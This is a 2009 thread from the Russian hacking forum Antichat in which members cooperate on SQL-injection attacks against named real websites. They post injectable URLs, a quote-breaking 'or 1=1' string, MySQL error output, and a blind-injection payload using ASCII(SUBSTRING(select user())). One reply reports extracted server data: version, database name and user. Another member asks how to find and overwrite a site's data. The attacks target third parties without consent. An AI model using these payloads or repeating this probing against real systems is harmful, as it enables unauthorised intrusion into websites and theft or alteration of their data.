ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
24.02.2009, 05:48
|
|
Banned
Регистрация: 12.02.2009
Сообщений: 73
Провел на форуме:
175651
Репутация:
171
|
|
Сообщение от l1ght
у меня сайт не пингуется, но если передать переменной значение вида ) or 1=1#', должен получится верный запрос (прошу проверить):
/add
имхо в запрос попадает &apos (в html &apos а при просмотре ')
Дело в том что выше постами было установлено, что апостроф фильтруется, а как я говорил ' это сделано для того, что бы красиво было глазам смотреть на "удавшийся" инъект. Вообще спасибо тебе за помощь, но ничего сделать нельзя так как апостроф нужно в любом случаю, что бы удовлетворить логику запроса 
|
|
|
24.02.2009, 06:31
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552
Репутация:
568
|
|
непонятная скуля.. да еще и сайт не быстр принайме у меня..
http://www.whimit.com/forum_read.php?f=17э&id=75739'
а как у вас? ) |
|
|
|
24.02.2009, 09:57
|
|
Участник форума
Регистрация: 01.09.2007
Сообщений: 203
Провел на форуме:
812964
Репутация:
302
|
|
http://www.whimit.com/forum_read.php?f=17
Invalid query: db_query - You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near 'and g.id=gb.id order by g.id' at line 1
А больше хрен че добьешся... Все фильтрует че только можно даже group by или внатуре фиг поймешь..
|
|
|
|
24.02.2009, 10:17
|
|
Banned
Регистрация: 20.05.2008
Сообщений: 281
Провел на форуме:
3200135
Репутация:
575
|
|
__www.dpstyle.com.ua
не могу найти файл, чтобы править данные вмида на свои. Уже всё перерыл. Где они вообще могут быть?
|
|
|
|
24.02.2009, 15:20
|
|
Участник форума
Регистрация: 26.07.2008
Сообщений: 267
Провел на форуме:
1343031
Репутация:
184
|
|
Нужен php-скрипт для удобной работы с базой оракл через веб-интерфейс. Т.е. что-то вроде rst-sql.php или phpmyadmin, но для Oracle.
|
|
|
|
24.02.2009, 15:38
|
|
Участник форума
Регистрация: 01.09.2007
Сообщений: 203
Провел на форуме:
812964
Репутация:
302
|
|
budden, этот вопрос не для раздела уязвимости!
|
|
|
|
24.02.2009, 16:21
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
вообще сайт бажный какой-то
1. Там с нормальными параметрами не работает:
Код:
http://www.whimit.com/forum_read.php?f=17&id=75739
2.
Код:
http://www.whimit.com/album_list.php?username=inmate051877lol
|
|
|
|
24.02.2009, 17:23
|
|
Постоянный
Регистрация: 07.02.2006
Сообщений: 630
Провел на форуме:
12985021
Репутация:
676
|
|
Сообщение от *eXe*
__www.dpstyle.com.ua
не могу найти файл, чтобы править данные вмида на свои. Уже всё перерыл.
В админке смотрел? 
Где они вообще могут быть?
В БД
Нужен php-скрипт для удобной работы с базой оракл через веб-интерфейс. Т.е. что-то вроде rst-sql.php или phpmyadmin, но для Oracle
phpOracleAdmin - ищи в гугле
|
|
|
|
24.02.2009, 19:14
|
|
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
Провел на форуме:
12942062
Репутация:
1550
|
|
http://lit.1september.ru/urok/index.php?SubjectID=100010'
Помогите, вроде скуля, а не крутится...
|
|
|
|
24.02.2009, 19:23
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
2 wildshaman
http://lit.1september.ru/urok/index.php?SubjectID=100010+AND+ASCII(SUBSTRING((se lect+user()),18,1))=x
я нашел слепухy
Version : 5.1.30-log
Database : dblit
User : webuser@localhost
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
